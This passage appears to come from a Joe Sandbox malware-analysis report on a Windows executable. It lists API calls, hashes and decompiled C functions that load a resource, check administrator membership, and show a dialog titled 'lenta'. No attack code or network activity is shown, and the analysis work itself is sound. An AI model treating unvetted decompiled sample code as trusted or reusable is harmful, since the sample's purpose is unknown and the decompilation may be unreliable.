                                                                                                                                                                                                                                              0x00973158
                                                                                                                                                                                                                                              0x0097316a
                                                                                                                                                                                                                                              0x00973176
                                                                                                                                                                                                                                              0x0097317d
                                                                                                                                                                                                                                              0x0097318b
                                                                                                                                                                                                                                              0x0097319e
                                                                                                                                                                                                                                              0x009731a3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009731ad
                                                                                                                                                                                                                                              0x00973120
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097312a
                                                                                                                                                                                                                                              0x00973134
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973134
                                                                                                                                                                                                                                              0x0097312c
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 0097313B
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0097314B
                                                                                                                                                                                                                                              • SetDlgItemTextA.USER32(?,00000834), ref: 0097316A
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 00973176
                                                                                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 0097317D
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000834), ref: 00973185
                                                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000FC), ref: 00973190
                                                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000FC,009730C0), ref: 009731A3
                                                                                                                                                                                                                                              • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 009731CA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                              • String ID: lenta
                                                                                                                                                                                                                                              • API String ID: 3785188418-2780258678
                                                                                                                                                                                                                                              • Opcode ID: 95ec171c8dd0a715e011b4d9f6b896f92ef1687aa029e60e190ced7ce2b5da34
                                                                                                                                                                                                                                              • Instruction ID: f76d428d2c614969c07188d98b6c1b8fd72dc474300fc5625c2535b8ab6fc1a2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95ec171c8dd0a715e011b4d9f6b896f92ef1687aa029e60e190ced7ce2b5da34
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B11723326C211BBEB115B249C0CB9E3B68FB86721F50C610F82D951E1DB759681F756
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                                                                              			E0097468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                              				long _t4;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				CHAR* _t14;
                                                                                                                                                                                                                                              				void* _t15;
                                                                                                                                                                                                                                              				long _t16;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t14 = __ecx;
                                                                                                                                                                                                                                              				_t11 = __edx;
                                                                                                                                                                                                                                              				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                                                              				_t16 = _t4;
                                                                                                                                                                                                                                              				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                              					if(_t16 == 0) {
                                                                                                                                                                                                                                              						L5:
                                                                                                                                                                                                                                              						return 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                              					if(_t15 == 0) {
                                                                                                                                                                                                                                              						goto L5;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                              					FreeResource(_t15);
                                                                                                                                                                                                                                              					return _t16;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t4;
                                                                                                                                                                                                                                              			}








                                                                                                                                                                                                                                              0x00974699
                                                                                                                                                                                                                                              0x0097469b
                                                                                                                                                                                                                                              0x009746a9
                                                                                                                                                                                                                                              0x009746af
                                                                                                                                                                                                                                              0x009746b4
                                                                                                                                                                                                                                              0x009746bc
                                                                                                                                                                                                                                              0x009746f9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009746f9
                                                                                                                                                                                                                                              0x009746d9
                                                                                                                                                                                                                                              0x009746dd
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009746e5
                                                                                                                                                                                                                                              0x009746ef
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009746f5
                                                                                                                                                                                                                                              0x009746ff

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746A0
                                                                                                                                                                                                                                              • SizeofResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746A9
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746C3
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746CC
                                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746D3
                                                                                                                                                                                                                                              • memcpy_s.MSVCRT ref: 009746E5
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009746EF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                              • String ID: TITLE$lenta
                                                                                                                                                                                                                                              • API String ID: 3370778649-2035842925
                                                                                                                                                                                                                                              • Opcode ID: 4798ad14af2870bdc8a9074bb17bdd7dd55acac16314ac8437ccf5c68735a7b3
                                                                                                                                                                                                                                              • Instruction ID: 33945f80672c638802ce50062f8e5d6a20c4c5807ecd67751441d7e2364bda1d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4798ad14af2870bdc8a9074bb17bdd7dd55acac16314ac8437ccf5c68735a7b3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE0136376582107BE31027A55C4DF7F7E2CEBC7F52F044414FA4D96191DA61888196A6
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 57%
                                                                                                                                                                                                                                              			E009717EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				short _v12;
                                                                                                                                                                                                                                              				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                              				void* _v24;
                                                                                                                                                                                                                                              				intOrPtr* _v28;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t14;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                              				long _t28;
                                                                                                                                                                                                                                              				void* _t35;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                              				signed int _t38;
                                                                                                                                                                                                                                              				intOrPtr* _t39;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t14 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                              				_v12 = 0x500;
                                                                                                                                                                                                                                              				_t37 = __ecx;
                                                                                                                                                                                                                                              				_v16.Value = 0;
                                                                                                                                                                                                                                              				_v28 = __ecx;
                                                                                                                                                                                                                                              				_t28 = 0;
                                                                                                                                                                                                                                              				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                              				if(_t36 != 0) {
                                                                                                                                                                                                                                              					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                              					_v20 = _t20;
                                                                                                                                                                                                                                              					if(_t20 != 0) {
                                                                                                                                                                                                                                              						 *_t37 = 0;
                                                                                                                                                                                                                                              						_t28 = 1;
                                                                                                                                                                                                                                              						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                              							_t37 = _t39;
                                                                                                                                                                                                                                              							 *0x97a288(0, _v24, _v28);
                                                                                                                                                                                                                                              							_v20();
                                                                                                                                                                                                                                              							if(_t39 != _t39) {
                                                                                                                                                                                                                                              								asm("int 0x29");
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							FreeSid(_v24);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					FreeLibrary(_t36);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                              			}



















                                                                                                                                                                                                                                              0x009717f6
                                                                                                                                                                                                                                              0x009717fd
                                                                                                                                                                                                                                              0x00971805
                                                                                                                                                                                                                                              0x0097180b
                                                                                                                                                                                                                                              0x0097180d
                                                                                                                                                                                                                                              0x00971815
                                                                                                                                                                                                                                              0x00971818
                                                                                                                                                                                                                                              0x00971820
                                                                                                                                                                                                                                              0x00971824
                                                                                                                                                                                                                                              0x0097182c
                                                                                                                                                                                                                                              0x00971832
                                                                                                                                                                                                                                              0x00971837
                                                                                                                                                                                                                                              0x00971851
                                                                                                                                                                                                                                              0x00971854
                                                                                                                                                                                                                                              0x0097185d
                                                                                                                                                                                                                                              0x00971862
                                                                                                                                                                                                                                              0x0097186c
                                                                                                                                                                                                                                              0x00971872
                                                                                                                                                                                                                                              0x00971877
                                                                                                                                                                                                                                              0x0097187e
                                                                                                                                                                                                                                              0x0097187e
                                                                                                                                                                                                                                              0x00971883
                                                                                                                                                                                                                                              0x00971883
                                                                                                                                                                                                                                              0x0097185d
                                                                                                                                                                                                                                              0x0097188a
                                                                                                                                                                                                                                              0x0097188a
                                                                                                                                                                                                                                              0x009718a2

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,009718DD), ref: 0097181A
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0097182C
                                                                                                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(009718DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,009718DD), ref: 00971855
                                                                                                                                                                                                                                              • FreeSid.ADVAPI32(?,?,?,?,009718DD), ref: 00971883
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,009718DD), ref: 0097188A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                              • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                              • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                              • Opcode ID: 1e0ec0ccbe6c0065061b0f2455a4290b9f90e66b0e32c5842dd97aaf375f8eb3
                                                                                                                                                                                                                                              • Instruction ID: 605d52d54812055516a812122f031372cb2b554edf249f7b0872d186abadfca7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e0ec0ccbe6c0065061b0f2455a4290b9f90e66b0e32c5842dd97aaf375f8eb3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B11BC32E14205AFDB109FA4DC49ABEB778EF85701F104569F919E3290DB309D409795
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00973450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                              				void* _t7;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				struct HWND__* _t12;
                                                                                                                                                                                                                                              				int _t22;
                                                                                                                                                                                                                                              				struct HWND__* _t24;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                              				if(_t7 == 0) {
                                                                                                                                                                                                                                              					EndDialog(_a4, 2);
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                              				if(_t11 == 0) {
                                                                                                                                                                                                                                              					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                              					_t24 = _a4;
                                                                                                                                                                                                                                              					E009743D0(_t24, _t12);
                                                                                                                                                                                                                                              					SetWindowTextA(_t24, "lenta");
                                                                                                                                                                                                                                              					SetDlgItemTextA(_t24, 0x838,  *0x979404);
                                                                                                                                                                                                                                              					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t11 == 1) {
                                                                                                                                                                                                                                              					_t22 = _a12;
                                                                                                                                                                                                                                              					if(_t22 < 6) {
                                                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t22 <= 7) {
                                                                                                                                                                                                                                              						L8:
                                                                                                                                                                                                                                              						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                              						return 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t22 != 0x839) {
                                                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *0x9791dc = 1;
                                                                                                                                                                                                                                              					goto L8;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}








                                                                                                                                                                                                                                              0x00973459
                                                                                                                                                                                                                                              0x0097345c
                                                                                                                                                                                                                                              0x009734d8
                                                                                                                                                                                                                                              0x009734de
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009734e0
                                                                                                                                                                                                                                              0x0097345e
                                                                                                                                                                                                                                              0x00973463
                                                                                                                                                                                                                                              0x0097349a
                                                                                                                                                                                                                                              0x009734a0
                                                                                                                                                                                                                                              0x009734a7
                                                                                                                                                                                                                                              0x009734b2
                                                                                                                                                                                                                                              0x009734c4
                                                                                                                                                                                                                                              0x009734cb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009734cb
                                                                                                                                                                                                                                              0x00973468
                                                                                                                                                                                                                                              0x0097346e
                                                                                                                                                                                                                                              0x00973474
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097347c
                                                                                                                                                                                                                                              0x0097348c
                                                                                                                                                                                                                                              0x00973490
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973496
                                                                                                                                                                                                                                              0x00973484
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973486
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973486
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EndDialog.USER32(?,?), ref: 00973490
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0097349A
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 009734B2
                                                                                                                                                                                                                                              • SetDlgItemTextA.USER32(?,00000838), ref: 009734C4
                                                                                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 009734CB
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000002), ref: 009734D8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                              • String ID: lenta
                                                                                                                                                                                                                                              • API String ID: 852535152-2780258678
                                                                                                                                                                                                                                              • Opcode ID: f36f8809f9958a16c77e389851d6c0d2d3fc8ec111e5ba4b017706ff5257551d
                                                                                                                                                                                                                                              • Instruction ID: d13de7f05415176bbe8b0fa550c20fd4dcaef010015eb644fa86e7f9b3cd417a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f36f8809f9958a16c77e389851d6c0d2d3fc8ec111e5ba4b017706ff5257551d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19019E33268114ABD71E5F69DC0C96D3B68FB85B01F50C420FA4E869B0CB359B91FB85
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                                                                                              			E00972AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t16;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				char _t32;
                                                                                                                                                                                                                                              				intOrPtr _t34;
                                                                                                                                                                                                                                              				char* _t38;
                                                                                                                                                                                                                                              				char _t42;
                                                                                                                                                                                                                                              				char* _t44;
                                                                                                                                                                                                                                              				CHAR* _t52;
                                                                                                                                                                                                                                              				intOrPtr* _t55;
                                                                                                                                                                                                                                              				CHAR* _t59;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				CHAR* _t64;
                                                                                                                                                                                                                                              				CHAR* _t65;
                                                                                                                                                                                                                                              				signed int _t66;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t60 = __edx;
                                                                                                                                                                                                                                              				_t16 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                              				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                              				_t65 = _a4;
                                                                                                                                                                                                                                              				_t44 = __edx;
                                                                                                                                                                                                                                              				_t64 = __ecx;
                                                                                                                                                                                                                                              				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                              					GetModuleFileNameA( *0x979a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                                                              						_t17 =  *_t64;
                                                                                                                                                                                                                                              						if(_t17 == 0) {
                                                                                                                                                                                                                                              							break;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                              						 *_t65 =  *_t64;
                                                                                                                                                                                                                                              						if(_t21 != 0) {
                                                                                                                                                                                                                                              							_t65[1] = _t64[1];
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                              							L19:
                                                                                                                                                                                                                                              							_t65 = CharNextA(_t65);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                              							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                                                              								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                                                              									if( *_t64 == 0x23) {
                                                                                                                                                                                                                                              										goto L19;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E00971680(_t65, E009717C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                              									_t52 = _t65;
                                                                                                                                                                                                                                              									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                                                              									_t60 = _t14;
                                                                                                                                                                                                                                              									do {
                                                                                                                                                                                                                                              										_t32 =  *_t52;
                                                                                                                                                                                                                                              										_t52 =  &(_t52[1]);
                                                                                                                                                                                                                                              									} while (_t32 != 0);
                                                                                                                                                                                                                                              									goto L17;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								E009765E8( &_v268);
                                                                                                                                                                                                                                              								_t55 =  &_v268;
                                                                                                                                                                                                                                              								_t62 = _t55 + 1;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t34 =  *_t55;
                                                                                                                                                                                                                                              									_t55 = _t55 + 1;
                                                                                                                                                                                                                                              								} while (_t34 != 0);
                                                                                                                                                                                                                                              								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                                                              								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                                                              									 *_t38 = 0;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								E00971680(_t65, E009717C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                              								_t59 = _t65;
                                                                                                                                                                                                                                              								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                              								_t60 = _t12;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t42 =  *_t59;
                                                                                                                                                                                                                                              									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                              								} while (_t42 != 0);
                                                                                                                                                                                                                                              								L17:
                                                                                                                                                                                                                                              								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *_t65 = _t17;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                              			}






















                                                                                                                                                                                                                                              0x00972aac
                                                                                                                                                                                                                                              0x00972ab7
                                                                                                                                                                                                                                              0x00972abc
                                                                                                                                                                                                                                              0x00972abe
                                                                                                                                                                                                                                              0x00972ac3
                                                                                                                                                                                                                                              0x00972ac6
                                                                                                                                                                                                                                              0x00972ac9
                                                                                                                                                                                                                                              0x00972ace
                                                                                                                                                                                                                                              0x00972ae6
                                                                                                                                                                                                                                              0x00972bdc
                                                                                                                                                                                                                                              0x00972bdc
                                                                                                                                                                                                                                              0x00972be0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972af2
                                                                                                                                                                                                                                              0x00972afc
                                                                                                                                                                                                                                              0x00972b00
                                                                                                                                                                                                                                              0x00972b05
                                                                                                                                                                                                                                              0x00972b05
                                                                                                                                                                                                                                              0x00972b0b
                                                                                                                                                                                                                                              0x00972bca
                                                                                                                                                                                                                                              0x00972bd1
                                                                                                                                                                                                                                              0x00972b11
                                                                                                                                                                                                                                              0x00972b18
                                                                                                                                                                                                                                              0x00972b26
                                                                                                                                                                                                                                              0x00972b99
                                                                                                                                                                                                                                              0x00972bc8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972b9b
                                                                                                                                                                                                                                              0x00972bae
                                                                                                                                                                                                                                              0x00972bb3
                                                                                                                                                                                                                                              0x00972bb5
                                                                                                                                                                                                                                              0x00972bb5
                                                                                                                                                                                                                                              0x00972bb8
                                                                                                                                                                                                                                              0x00972bb8
                                                                                                                                                                                                                                              0x00972bba
                                                                                                                                                                                                                                              0x00972bbb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972bb8
                                                                                                                                                                                                                                              0x00972b28
                                                                                                                                                                                                                                              0x00972b2e
                                                                                                                                                                                                                                              0x00972b33
                                                                                                                                                                                                                                              0x00972b39
                                                                                                                                                                                                                                              0x00972b3c
                                                                                                                                                                                                                                              0x00972b3c
                                                                                                                                                                                                                                              0x00972b3e
                                                                                                                                                                                                                                              0x00972b3f
                                                                                                                                                                                                                                              0x00972b55
                                                                                                                                                                                                                                              0x00972b5d
                                                                                                                                                                                                                                              0x00972b64
                                                                                                                                                                                                                                              0x00972b64
                                                                                                                                                                                                                                              0x00972b7a
                                                                                                                                                                                                                                              0x00972b7f
                                                                                                                                                                                                                                              0x00972b81
                                                                                                                                                                                                                                              0x00972b81
                                                                                                                                                                                                                                              0x00972b84
                                                                                                                                                                                                                                              0x00972b84
                                                                                                                                                                                                                                              0x00972b86
                                                                                                                                                                                                                                              0x00972b87
                                                                                                                                                                                                                                              0x00972bbf
                                                                                                                                                                                                                                              0x00972bc1
                                                                                                                                                                                                                                              0x00972bc1
                                                                                                                                                                                                                                              0x00972b26
                                                                                                                                                                                                                                              0x00972bda
                                                                                                                                                                                                                                              0x00972bda
                                                                                                                                                                                                                                              0x00972be6
                                                                                                                                                                                                                                              0x00972be6
                                                                                                                                                                                                                                              0x00972bf8

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00972AE6
                                                                                                                                                                                                                                              • IsDBCSLeadByte.KERNEL32(00000000), ref: 00972AF2
                                                                                                                                                                                                                                              • CharNextA.USER32(?), ref: 00972B12
                                                                                                                                                                                                                                              • CharUpperA.USER32 ref: 00972B1E
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,?), ref: 00972B55
                                                                                                                                                                                                                                              • CharNextA.USER32(?), ref: 00972BD4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
